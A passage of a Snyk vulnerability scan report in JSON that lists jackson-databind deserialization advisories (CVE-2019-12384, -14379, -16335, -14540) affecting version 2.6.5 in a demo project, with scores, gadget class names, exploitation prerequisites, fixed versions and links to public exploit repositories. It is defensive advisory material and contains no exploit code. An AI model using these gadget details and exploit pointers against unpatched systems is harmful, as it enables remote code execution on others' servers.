{ + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:45.683422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.645685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:50.734463Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data which allows attackers to have a variety of impacts by leveraging failure to block the `logback-core` class from polymorphic deserialization. Depending on the `classpath` content, remote code execution may be possible.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.1, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [Debian Security Announcement](https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html)\n- [Exploit](https://github.com/jas502n/CVE-2019-12384)\n- [Github Fix](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/src/main/java/com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2334)\n- [Jackson CVEs Don't Panic - Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Release Notes](https://github.com/FasterXML/jackson-databind/blob/a6667bcd1f0114f5b004d5203f4139b1e6104a1c/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.97607", + "probability": "0.53288", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12384" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mph4-vhrx-mv67" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-06-25T10:06:54.889582Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-28T10:27:59Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-06-25T10:26:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.734463Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.033731Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.849047Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.502907Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14439](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.83638", + "probability": "0.00984", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14379" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-07-29T14:55:33.030000Z", + "functions_new": [ + { + "version": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.502907Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467014", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2449", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.808389Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:54.800234Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to 